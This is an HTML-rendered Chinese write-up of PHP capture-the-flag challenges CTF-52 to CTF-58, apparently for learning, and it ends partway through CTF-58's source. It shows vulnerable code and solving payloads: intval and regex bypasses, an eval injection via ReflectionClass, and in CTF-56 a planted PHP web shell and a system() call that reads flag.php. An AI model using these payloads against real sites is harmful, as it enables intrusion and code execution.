<div class="markdown-body editormd-preview-container" previewcontainer="true" style="padding: 20px;"><div class="markdown-toc editormd-markdown-toc"><ul class="markdown-toc-list"><li><a class="toc-level-2" href="#CTF-52" level="2">CTF-52</a></li><li><a class="toc-level-2" href="#CTF-53" level="2">CTF-53</a></li><li><a class="toc-level-2" href="#CTF-54" level="2">CTF-54</a></li><li><a class="toc-level-2" href="#CTF-55" level="2">CTF-55</a></li><li><a class="toc-level-2" href="#CTF-56" level="2">CTF-56</a></li><li><a class="toc-level-2" href="#CTF-57" level="2">CTF-57</a></li><li><a class="toc-level-2" href="#CTF-58" level="2">CTF-58</a></li><li><a class="toc-level-2" href="#CTF-59" level="2">CTF-59</a></li><li><a class="toc-level-2" href="#CTF-60" level="2">CTF-60</a></li><li><a class="toc-level-2" href="#CTF-61" level="2">CTF-61</a></li><li><a class="toc-level-2" href="#CTF-62" level="2">CTF-62</a></li><li><a class="toc-level-2" href="#CTF-64" level="2">CTF-64</a></li><li><a class="toc-level-2" href="#CTF-65" level="2">CTF-65</a></li><li><a class="toc-level-2" href="#CTF-66" level="2">CTF-66</a></li><li><a class="toc-level-2" href="#CTF-67" level="2">CTF-67</a></li><li><a class="toc-level-2" href="#CTF-68" level="2">CTF-68</a></li><li><a class="toc-level-2" href="#CTF-69" level="2">CTF-69</a></li><li><a class="toc-level-2" href="#CTF-70" level="2">CTF-70</a></li><li><a class="toc-level-2" href="#CTF-71" level="2">CTF-71</a></li><li><a class="toc-level-2" href="#CTF-72" level="2">CTF-72</a></li><li><a class="toc-level-2" href="#CTF-73" level="2">CTF-73</a></li><li><a class="toc-level-2" href="#CTF-74" level="2">CTF-74</a></li><li><a class="toc-level-2" href="#CTF-75" level="2">CTF-75</a></li><li><a class="toc-level-2" href="#CTF-76" level="2">CTF-76</a></li><li><a class="toc-level-2" href="#CTF-77" level="2">CTF-77</a></li><li><a class="toc-level-2" href="#CTF-78" level="2">CTF-78</a></li><li><a class="toc-level-2" href="#CTF-79" level="2">CTF-79</a></li><li><a class="toc-level-2" href="#CTF-80" level="2">CTF-80</a></li><li><a class="toc-level-2" href="#CTF-81" level="2">CTF-81</a></li><li><a class="toc-level-2" href="#CTF-82" level="2">CTF-82</a><ul></ul></li></ul></div><h2 id="h2-ctf-52"><a name="CTF-52" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-52</h2><p><strong>源码分析</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">&lt;?</span><span class="pln">php </span></code></li><li class="L1"><code><span class="pln">include</span><span class="pun">(</span><span class="str">"flag.php"</span><span class="pun">);</span></code></li><li class="L2"><code><span class="pln">highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L3"><code><span class="kwd">if</span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'num'</span><span class="pun">]))</span></code></li><li class="L4"><code><span class="pun">{</span><span class="pln"> </span></code></li><li class="L5"><code><span class="pln">    $num </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'num'</span><span class="pun">];</span><span class="pln"> </span></code></li><li class="L6"><code><span class="pln">    </span><span class="kwd">if</span><span class="pun">(</span><span class="pln">$num</span><span class="pun">===</span><span class="str">"4396"</span><span class="pun">){</span><span class="pln"> </span></code></li><li class="L7"><code><span class="pln">            </span><span class="kwd">die</span><span class="pun">(</span><span class="str">"no no no!"</span><span class="pun">);</span><span class="pln"> </span></code></li><li class="L8"><code><span class="pln">    </span><span class="pun">}</span><span class="pln"> </span></code></li><li class="L9"><code><span class="pln">    </span><span class="kwd">if</span><span class="pun">(</span><span class="pln">intval</span><span class="pun">(</span><span class="pln">$num</span><span class="pun">,</span><span class="lit">0</span><span class="pun">)===</span><span class="lit">4396</span><span class="pun">){</span></code></li><li class="L0"><code><span class="pln">            echo $flag</span><span class="pun">;</span><span class="pln"> </span></code></li><li class="L1"><code><span class="pln">    </span><span class="pun">}</span></code></li><li class="L2"><code><span class="pln">    </span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L3"><code><span class="pln">            echo intval</span><span class="pun">(</span><span class="pln">$num</span><span class="pun">,</span><span class="lit">0</span><span class="pun">);</span><span class="pln"> </span></code></li><li class="L4"><code><span class="pln">    </span><span class="pun">}</span><span class="pln"> </span></code></li><li class="L5"><code><span class="pun">}</span><span class="pln"> </span></code></li><li class="L6"><code><span class="pun">?&gt;</span></code></li></ol></pre><p><strong>4396的八进制数<br>满足条件intval($num,0)===4396<br>就可以获取到flag<br>通过进制转换绕过 if($num===”4396”)<br>如果字符串包括了 “0x” 或“0X” 的前缀，则代表使用 16 进制 hex；<br>否则，如果字符串以 “0” 开始，使用 8 进制 octal；<br>否则，将使用 10 进制 decimal。<br>这里我以0开始，意思就是后面的数字将被以8进制的形式读取<br>把4396进行8进制转换</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">payload</span><span class="pun">：?</span><span class="pln">num</span><span class="pun">=</span><span class="lit">010454</span></code></li></ol></pre><h2 id="h2-ctf-53"><a name="CTF-53" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-53</h2><p><strong>一道简单的正则</strong></p>
<p><strong>考察点：正则表达式修饰符<br>拓展php</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">^</span><span class="pln">    </span><span class="pun">匹配字符串的开始</span></code></li><li class="L1"><code><span class="pln">i    </span><span class="pun">不区分(</span><span class="pln">ignore</span><span class="pun">)大小写</span></code></li><li class="L2"><code><span class="pln">m    </span><span class="pun">(</span><span class="pln">more</span><span class="pun">)多行匹配</span></code></li><li class="L3"><code><span class="pun">若存在换行</span><span class="pln">\n</span><span class="pun">并且有开始^或结束</span><span class="pln">$</span><span class="pun">符的情况下，</span></code></li><li class="L4"><code><span class="pun">将以换行为分隔符，逐行进行匹配</span></code></li><li class="L5"><code><span class="pln">$    </span><span class="pun">匹配字符串的结束</span></code></li></ol></pre><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">$str </span><span class="pun">=</span><span class="pln"> </span><span class="str">"abc\nabc"</span><span class="pun">;</span></code></li><li class="L1"><code><span class="pln">$preg </span><span class="pun">=</span><span class="pln"> </span><span class="str">"/^abc$/m"</span><span class="pun">;</span></code></li><li class="L2"><code><span class="pln">preg_match</span><span class="pun">(</span><span class="pln">$preg</span><span class="pun">,</span><span class="pln"> $str</span><span class="pun">,</span><span class="pln">$matchs</span><span class="pun">);</span></code></li><li class="L3"><code><span class="pun">这样其实是符合正则表达式的，因为匹配的时候</span><span class="pln"> </span><span class="pun">先是匹配换行符前面的，接着匹配换行符后面的，两个都是</span><span class="pln">abc</span><span class="pun">所以可以通过正则表达式。</span></code></li></ol></pre><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">A    </span><span class="pun">强制从目标字符串开头匹配;</span></code></li><li class="L1"><code><span class="pln">D    </span><span class="pun">如果使用</span><span class="pln">$</span><span class="pun">限制结尾字符,则不允许结尾有换行;</span><span class="pln"> </span></code></li><li class="L2"><code><span class="pln">e    </span><span class="pun">配合函数</span><span class="pln">preg_replace</span><span class="pun">()使用,</span><span class="pln"> </span><span class="pun">可以把匹配来的字符串当作正则表达式执行;</span></code></li></ol></pre><p><strong>需要满足第一个匹配同时不满足第二匹配固定字符串”php”</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">payload</span><span class="pun">：?</span><span class="pln">cmd</span><span class="pun">=%</span><span class="lit">0aphp</span></code></li></ol></pre><h2 id="h2-ctf-54"><a name="CTF-54" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-54</h2><p><strong>源码分析</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">include </span><span class="pun">(</span><span class="str">"flag.php"</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-php"><span class="pln">highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L3"><code class="lang-php"><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'num'</span><span class="pun">]))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    $num </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'num'</span><span class="pun">];</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$num </span><span class="pun">==</span><span class="pln"> </span><span class="lit">4476</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L6"><code class="lang-php"><span class="pln">        </span><span class="kwd">die</span><span class="pun">(</span><span class="str">"no no no!"</span><span class="pun">);</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L8"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">intval</span><span class="pun">(</span><span class="pln">$num</span><span class="pun">,</span><span class="pln"> </span><span class="lit">0</span><span class="pun">)</span><span class="pln"> </span><span class="pun">==</span><span class="pln"> </span><span class="lit">4476</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L9"><code class="lang-php"><span class="pln">        echo $flag</span><span class="pun">;</span></code></li><li class="L0"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L1"><code class="lang-php"><span class="pln">        echo intval</span><span class="pun">(</span><span class="pln">$num</span><span class="pun">,</span><span class="pln"> </span><span class="lit">0</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L3"><code class="lang-php"><span class="pun">}</span></code></li><li class="L4"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<p>这里使用的是 == 等号<br>所以可以将4476进行16进制转码</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">payload</span><span class="pun">:</span><span class="pln"> </span><span class="pun">?</span><span class="pln">num</span><span class="pun">=</span><span class="lit">0x117c</span></code></li></ol></pre><h2 id="h2-ctf-55"><a name="CTF-55" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-55</h2><p><strong>源码分析</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">include </span><span class="pun">(</span><span class="str">"flag.php"</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-php"><span class="pln">highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L3"><code class="lang-php"><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'num'</span><span class="pun">]))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    $num </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'num'</span><span class="pun">];</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$num </span><span class="pun">===</span><span class="pln"> </span><span class="str">"4476"</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L6"><code class="lang-php"><span class="pln">        </span><span class="kwd">die</span><span class="pun">(</span><span class="str">"no no no!"</span><span class="pun">);</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L8"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">"/[a-z]/i"</span><span class="pun">,</span><span class="pln"> $num</span><span class="pun">))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L9"><code class="lang-php"><span class="pln">        </span><span class="kwd">die</span><span class="pun">(</span><span class="str">"no no no!"</span><span class="pun">);</span></code></li><li class="L0"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L1"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(!</span><span class="pln">strpos</span><span class="pun">(</span><span class="pln">$num</span><span class="pun">,</span><span class="pln"> </span><span class="str">"0"</span><span class="pun">))</span><span class="pln"> </span><span class="pun">{</span><span class="pln"> </span></code></li><li class="L2"><code class="lang-php"><span class="pln">        </span><span class="kwd">die</span><span class="pun">(</span><span class="str">"no no no!"</span><span class="pun">);</span><span class="pln"> </span></code></li><li class="L3"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span><span class="pln"> </span></code></li><li class="L4"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pun">(</span><span class="pln">intval</span><span class="pun">(</span><span class="pln">$num</span><span class="pun">,</span><span class="lit">0</span><span class="pun">)===</span><span class="lit">4476</span><span class="pun">){</span></code></li><li class="L5"><code class="lang-php"><span class="pln">        echo $flag</span><span class="pun">;</span><span class="pln"> </span></code></li><li class="L6"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span><span class="pln"> </span></code></li><li class="L7"><code class="lang-php"><span class="pun">}</span></code></li><li class="L8"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<p><strong>多了正则过滤之前的进制转换不可行了</strong><br><strong>但是我们可以利用小数4476.0 = 4476</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">payload</span><span class="pun">:</span><span class="pln"> </span><span class="pun">?</span><span class="pln">num</span><span class="pun">=</span><span class="lit">4476.0</span></code></li></ol></pre><h2 id="h2-ctf-56"><a name="CTF-56" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-56</h2><p><strong>源码分析</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-php"><span class="pln">$allow </span><span class="pun">=</span><span class="pln"> array</span><span class="pun">();</span></code></li><li class="L3"><code class="lang-php"><span class="kwd">for</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$i </span><span class="pun">=</span><span class="pln"> </span><span class="lit">36</span><span class="pun">;</span><span class="pln">$i </span><span class="pun">&lt;</span><span class="pln"> </span><span class="lit">0x36d</span><span class="pun">;</span><span class="pln">$i</span><span class="pun">++)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    array_push</span><span class="pun">(</span><span class="pln">$allow</span><span class="pun">,</span><span class="pln"> rand</span><span class="pun">(</span><span class="lit">1</span><span class="pun">,</span><span class="pln"> $i</span><span class="pun">));</span></code></li><li class="L5"><code class="lang-php"><span class="pun">}</span></code></li><li class="L6"><code class="lang-php"><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'n'</span><span class="pun">])</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> in_array</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'n'</span><span class="pun">],</span><span class="pln"> $allow</span><span class="pun">))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    file_put_contents</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'n'</span><span class="pun">],</span><span class="pln"> $_POST</span><span class="pun">[</span><span class="str">'content'</span><span class="pun">]);</span></code></li><li class="L8"><code class="lang-php"><span class="pun">}</span></code></li><li class="L9"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<p><strong>array_push 函数：向数组尾部插入一个或多个元素</strong><br><strong>这道题可以通过写入文件来读取flag或者直接getshell</strong><br><strong>rand 函数随机生成数组randmin,max<br>file_put_contents 函数：写入函数</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">payload</span><span class="pun">：</span><span class="pln">GET</span><span class="pun">:?</span><span class="pln">n</span><span class="pun">=</span><span class="pln">hack</span><span class="pun">.</span><span class="pln">php</span></code></li><li class="L1"><code></code></li><li class="L2"><code></code></li><li class="L3"><code><span class="pln">POST</span><span class="pun">传入的参数会写入到</span><span class="pln">hack</span><span class="pun">.</span><span class="pln">php</span><span class="pun">中</span></code></li><li class="L4"><code><span class="pun">二选一</span></code></li><li class="L5"><code><span class="pln">POST</span><span class="pun">:</span></code></li><li class="L6"><code><span class="pln">content</span><span class="pun">=&lt;?</span><span class="pln">php </span><span class="lit">@eval</span><span class="pun">(</span><span class="pln">$_REQUEST</span><span class="pun">[</span><span class="str">'hack'</span><span class="pun">]);?&gt;</span></code></li><li class="L7"><code></code></li><li class="L8"><code><span class="pln">POST</span><span class="pun">:</span></code></li><li class="L9"><code><span class="pln">content</span><span class="pun">=&lt;?</span><span class="pln">php system</span><span class="pun">(</span><span class="str">'cat flag.php'</span><span class="pun">);?&gt;</span></code></li></ol></pre><h2 id="h2-ctf-57"><a name="CTF-57" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-57</h2><p><strong>源码分析</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-php"><span class="pln">include </span><span class="pun">(</span><span class="str">"flag.php"</span><span class="pun">);</span></code></li><li class="L3"><code class="lang-php"><span class="pln">$flag </span><span class="pun">=</span><span class="pln"> </span><span class="kwd">new</span><span class="pln"> flag</span><span class="pun">();</span></code></li><li class="L4"><code class="lang-php"><span class="pln">$v1 </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'v1'</span><span class="pun">];</span></code></li><li class="L5"><code class="lang-php"><span class="pln">$v2 </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'v2'</span><span class="pun">];</span></code></li><li class="L6"><code class="lang-php"><span class="pln">$v3 </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'v3'</span><span class="pun">];</span></code></li><li class="L7"><code class="lang-php"><span class="pln">$v0 </span><span class="pun">=</span><span class="pln"> is_numeric</span><span class="pun">(</span><span class="pln">$v1</span><span class="pun">)</span><span class="pln"> </span><span class="kwd">and</span><span class="pln"> is_numeric</span><span class="pun">(</span><span class="pln">$v2</span><span class="pun">)</span><span class="pln"> </span><span class="kwd">and</span><span class="pln"> is_numeric</span><span class="pun">(</span><span class="pln">$v3</span><span class="pun">);</span></code></li><li class="L8"><code class="lang-php"><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$v0</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L9"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(!</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">"/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\)|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\;|\?|[0-9]/"</span><span class="pun">,</span><span class="pln"> $v2</span><span class="pun">))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L0"><code class="lang-php"><span class="pln">        </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(!</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">"/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\(|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\?|[0-9]/"</span><span class="pun">,</span><span class="pln"> $v3</span><span class="pun">))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L1"><code class="lang-php"><span class="pln">            </span><span class="kwd">eval</span><span class="pun">(</span><span class="str">"$v2('flag')$v3"</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-php"><span class="pln">        </span><span class="pun">}</span></code></li><li class="L3"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L4"><code class="lang-php"><span class="pun">}</span></code></li><li class="L5"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<p>这里牵扯到的是一个反射类的问题</p>
<p>php反射类 ReflectionClass使用例子</p>
<p>PHP的反射类ReflectionClass、ReflectionMethod使用实例</p>
<p>反射在 PHP 中的应用</p>
<p>反射类可以说成是类的一个映射，可以利用反射类来代替有关类的应用的任何语句</p>
<p>其属性为类的一个名称，这道题目里面类的名称为flag</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">payload</span><span class="pun">：?</span><span class="pln">v1</span><span class="pun">=</span><span class="lit">1</span><span class="pun">&amp;</span><span class="pln">v2</span><span class="pun">=</span><span class="pln">echo </span><span class="kwd">new</span><span class="pln"> </span><span class="typ">ReflectionClass</span><span class="pun">&amp;</span><span class="pln">v3</span><span class="pun">=;</span></code></li></ol></pre><p><strong>举个例子</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L2"><code class="lang-php"><span class="kwd">class</span><span class="pln"> hacker</span><span class="pun">{</span></code></li><li class="L3"><code class="lang-php"><span class="pln">    </span><span class="kwd">public</span><span class="pln"> $hackername </span><span class="pun">=</span><span class="pln"> </span><span class="str">"hackhello"</span><span class="pun">;</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    </span><span class="kwd">const</span><span class="pln">  hackhello</span><span class="pun">=</span><span class="str">'nb666'</span><span class="pun">;</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    </span><span class="kwd">public</span><span class="pln">  </span><span class="kwd">function</span><span class="pln"> show</span><span class="pun">(){</span></code></li><li class="L6"><code class="lang-php"><span class="pln">    echo $this</span><span class="pun">-&gt;</span><span class="pln">name</span><span class="pun">,</span><span class="str">'&lt;br&gt;'</span><span class="pun">;</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L8"><code class="lang-php"><span class="pun">}</span></code></li><li class="L9"><code class="lang-php"><span class="com">//有这么一个hacker类，假设我们不知道这个类是干什么用的，我们需要知道类里面的信息，这时候就需要用到ReflectionClass来对类进行反射</span></code></li><li class="L0"><code class="lang-php"><span class="com">//现在我可以通过反射来获取这个类中的方法，属性，常量</span></code></li><li class="L1"><code class="lang-php"><span class="com">//通过反射获取类的信息</span></code></li><li class="L2"><code class="lang-php"></code></li><li class="L3"><code class="lang-php"><span class="pln">$reflection </span><span class="pun">=</span><span class="pln"> </span><span class="kwd">new</span><span class="pln"> </span><span class="typ">ReflectionClass</span><span class="pun">(</span><span class="str">'hacker'</span><span class="pun">);</span><span class="com">//实例化反射对象,映射hacker类的信息</span></code></li><li class="L4"><code class="lang-php"><span class="pln">$consts </span><span class="pun">=</span><span class="pln"> $reflection</span><span class="pun">-&gt;</span><span class="pln">getConstants</span><span class="pun">();</span><span class="com">//获取所有常量</span></code></li><li class="L5"><code class="lang-php"><span class="pln">$props </span><span class="pun">=</span><span class="pln"> $reflection</span><span class="pun">-&gt;</span><span class="pln">getProperties</span><span class="pun">();</span><span class="com">//获取所有属性</span></code></li><li class="L6"><code class="lang-php"><span class="pln">$methods </span><span class="pun">=</span><span class="pln"> $reflection</span><span class="pun">-&gt;</span><span class="pln">getMethods</span><span class="pun">();</span><span class="com">//获取所有方法</span></code></li><li class="L7"><code class="lang-php"><span class="pln">var_dump</span><span class="pun">(</span><span class="pln">$consts</span><span class="pun">);</span></code></li><li class="L8"><code class="lang-php"><span class="pln">var_dump</span><span class="pun">(</span><span class="pln">$props</span><span class="pun">);</span></code></li><li class="L9"><code class="lang-php"><span class="pln">var_dump</span><span class="pun">(</span><span class="pln">$methods</span><span class="pun">);</span></code></li><li class="L0"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">返回值：</span></code></li><li class="L1"><code><span class="pln">php</span></code></li><li class="L2"><code><span class="pln">array</span><span class="pun">(</span><span class="lit">1</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L3"><code><span class="pln">  </span><span class="pun">[</span><span class="str">"hackhello"</span><span class="pun">]=&gt;</span></code></li><li class="L4"><code><span class="pln">  </span><span class="kwd">string</span><span class="pun">(</span><span class="lit">5</span><span class="pun">)</span><span class="pln"> </span><span class="str">"nb666"</span></code></li><li class="L5"><code><span class="pun">}</span></code></li><li class="L6"><code><span class="pln">array</span><span class="pun">(</span><span class="lit">1</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L7"><code><span class="pln">  </span><span class="pun">[</span><span class="lit">0</span><span class="pun">]=&gt;</span></code></li><li class="L8"><code><span class="pln">  </span><span class="pun">&amp;</span><span class="kwd">object</span><span class="pun">(</span><span class="typ">ReflectionProperty</span><span class="pun">)#</span><span class="lit">2</span><span class="pln"> </span><span class="pun">(</span><span class="lit">2</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L9"><code><span class="pln">    </span><span class="pun">[</span><span class="str">"name"</span><span class="pun">]=&gt;</span></code></li><li class="L0"><code><span class="pln">    </span><span class="kwd">string</span><span class="pun">(</span><span class="lit">10</span><span class="pun">)</span><span class="pln"> </span><span class="str">"hackername"</span></code></li><li class="L1"><code><span class="pln">    </span><span class="pun">[</span><span class="str">"class"</span><span class="pun">]=&gt;</span></code></li><li class="L2"><code><span class="pln">    </span><span class="kwd">string</span><span class="pun">(</span><span class="lit">6</span><span class="pun">)</span><span class="pln"> </span><span class="str">"hacker"</span></code></li><li class="L3"><code><span class="pln">  </span><span class="pun">}</span></code></li><li class="L4"><code><span class="pun">}</span></code></li><li class="L5"><code><span class="pln">array</span><span class="pun">(</span><span class="lit">1</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L6"><code><span class="pln">  </span><span class="pun">[</span><span class="lit">0</span><span class="pun">]=&gt;</span></code></li><li class="L7"><code><span class="pln">  </span><span class="pun">&amp;</span><span class="kwd">object</span><span class="pun">(</span><span class="typ">ReflectionMethod</span><span class="pun">)#</span><span class="lit">3</span><span class="pln"> </span><span class="pun">(</span><span class="lit">2</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L8"><code><span class="pln">    </span><span class="pun">[</span><span class="str">"name"</span><span class="pun">]=&gt;</span></code></li><li class="L9"><code><span class="pln">    </span><span class="kwd">string</span><span class="pun">(</span><span class="lit">4</span><span class="pun">)</span><span class="pln"> </span><span class="str">"show"</span></code></li><li class="L0"><code><span class="pln">    </span><span class="pun">[</span><span class="str">"class"</span><span class="pun">]=&gt;</span></code></li><li class="L1"><code><span class="pln">    </span><span class="kwd">string</span><span class="pun">(</span><span class="lit">6</span><span class="pun">)</span><span class="pln"> </span><span class="str">"hacker"</span></code></li><li class="L2"><code><span class="pln">  </span><span class="pun">}</span></code></li><li class="L3"><code><span class="pun">}</span></code></li></ol></pre><p><strong>如果没有指定方法的话，就会像题目中默认输出很多东西：</strong></p>
<p>1.常量 Contants<br>2.属性 Property Names<br>3.方法 Method Names静态<br>4.属性 Static Properties<br>5.命名空间 Namespace<br>6.Person类是否为final或者abstract<br>7.Person类是否有某个方法</p>
<h2 id="h2-ctf-58"><a name="CTF-58" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-58</h2><p><strong>源码分析</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-php"><span class="pln">error_reporting</span><span class="pun">(</span><span class="lit">0</span><span class="pun">);</span></code></li><li class="L3"><code class="lang-php"><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'v1'</span><span class="pun">])</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'v2'</span><span class="pun">]))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    $v1 </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'v1'</span><span class="pun">];</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    $v2 </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'v2'</span><span class="pun">];</span></code></li><li class="L6"><code 